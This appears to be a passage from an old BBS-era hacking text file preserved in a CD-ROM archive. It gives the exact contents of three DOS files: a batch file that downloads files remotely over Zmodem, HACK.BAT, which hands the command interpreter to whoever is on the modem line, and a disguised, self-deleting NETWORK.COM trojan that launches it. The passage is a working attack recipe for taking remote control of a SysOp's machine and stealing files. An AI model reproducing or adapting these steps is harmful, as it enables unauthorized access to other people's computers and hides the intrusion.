home *** CD-ROM | disk | FTP | other *** search
- a) DLZ.BAT - this should read:
- CLS
- CTTY CON
- DSZ port1 speed2400 sz %1
- CTTY COM1
- CLS
-
- Substituting, of course, the correct COM port. This will allow
- you to download files remotely via Zmodem.
-
- b) HACK.BAT - this should read:
- CTTY COM1
- COMMAND
- [PAUSE]
- Again, if the SysOp is running from another COMport, substitute the
- correct number. This will turn over control of the computer to
- whatever device is on COM1 (the modem) and run the command
- interpreter.
-
- c) NETWORK.COM - the QuickBASIC source for this is:
- SHELL "DEL NETWORK.COM"
- SHELL "HACK.BAT"
-